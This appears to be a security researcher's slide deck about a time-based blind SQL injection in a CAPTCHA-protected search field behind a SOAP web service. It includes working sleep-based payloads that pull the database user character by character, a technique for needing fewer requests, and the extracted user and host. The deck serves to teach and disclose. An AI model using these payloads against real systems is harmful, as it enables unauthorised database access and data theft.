
Time based CAPTCHA protected SQL injection through SOAP-webservice

2,495 views

Here's a fun bug I found recently which made me do some serious optimization to gather the data due to the CAPTCHA in between.

Published in: Technology

Time based CAPTCHA protected SQL injection through SOAP-webservice

  1. detectify: Time based captcha protected SQL injection through SOAP-webservice. Frans Rosén @fransrosen
  2. Search + CAPTCHA
  3. Search for Bobby: '
  4. Search: '-sleep(5)-'
  5. CAPTCHA… https://twitter.com/offensive_image/status/751191306500734976
  6. Me need:
     1. Do a clear PoC – get data
     2. As few requests as possible
     3. Find ALL the store fronts!
     4. ???
     5. PROFIT!!!
  7. user(): '-sleep((ascii(substring(user(), 1, 1)) - 90) / 2)-'
  8. user(): '-sleep((ascii(substring(user(), 1, 1)) - 90) / 2)-'
     (14*2) + 90 = 118 == v
  9. Validate:
     '-(if(ascii(substring(user(), 1, 1)) = 117, sleep(3),1))-
     (if(ascii(substring(user(), 1, 1)) = 118, sleep(6),1))-
     (if(ascii(substring(user(), 1, 1)) = 119, sleep(9),1))-' === v
  10. Down on the @: '-sleep((ascii(substring(user(), 21, 1)) - 90) / 2)-'
  11. Host search: '-sleep((ascii(substring(user(), 21, 1)) - 46) * 2)-'
  12. Host search: 0s for a dot. (T - 4) / 2 = 2
      '-sleep((ascii(substring(user(), 21, 1)) - 46) * 2)-'
  13. Setup
  14. Result: rawskuiumsal@192.251.68.254
  15. Result
  16. Other: SQL Injection Optimization and Obfuscation Techniques, https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf
  17. Thanks! Frans Rosén (@fransrosen) – www.detectify.com
